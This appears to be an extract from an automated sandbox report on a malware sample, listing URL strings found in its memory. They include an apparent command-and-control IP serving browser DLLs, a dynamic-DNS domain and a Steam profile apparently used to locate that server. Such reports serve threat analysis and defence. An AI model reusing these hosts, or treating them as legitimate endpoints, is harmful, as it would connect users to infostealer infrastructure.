Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://arpdabl.zapto.
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://arpdabl.zapto.KKFH
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://arpdabl.zapto.org
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.0000000019010000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.00000000025D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.0000000019010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/1/z
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.00000000025D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/s
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://arpdabl.zapto.orgH
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://arpdabl.zaptoJKKFH
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2996738117.000000001906B000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2996603846.000000001906C000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2996738117.000000001906B000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2996603846.000000001906C000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2996603846.000000001906C000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2996738117.000000001906B000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2996738117.000000001906B000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2996603846.000000001906C000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2996738117.000000001906B000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2996603846.000000001906C000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2996738117.000000001906B000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2996738117.000000001906B000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2996603846.000000001906C000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2996738117.000000001906B000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: build_2024-07-25_20-56.exe, build_2024-07-25_20-56.exe, 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.10.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3366592363.000000001939D000.00000002.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199747278259[1].htm.10.dr	String found in binary or memory: https://5.75.212.60
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2963897294.0000000019020000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/(
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/4
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/?
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2975271136.000000001901E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/AR
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/E
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/L
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/Z
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dll
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dllu
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/mozglue.dll
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/msvcp140.dll
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/msvcp140.dlld
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.3103241873.0000000019029000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.3103162642.0000000019020000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/nss3.dll
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.3103241873.0000000019029000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.3103162642.0000000019020000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/nss3.dllll
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/softokn3.dll
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/softokn3.dllj
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/sqls.dll
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.3070989152.0000000019020000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/vcruntime140.dll
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://5.75.212.60art/form-data;
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199747278259[1].htm.10.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3367211435.0000000019990000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3367211435.0000000019990000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
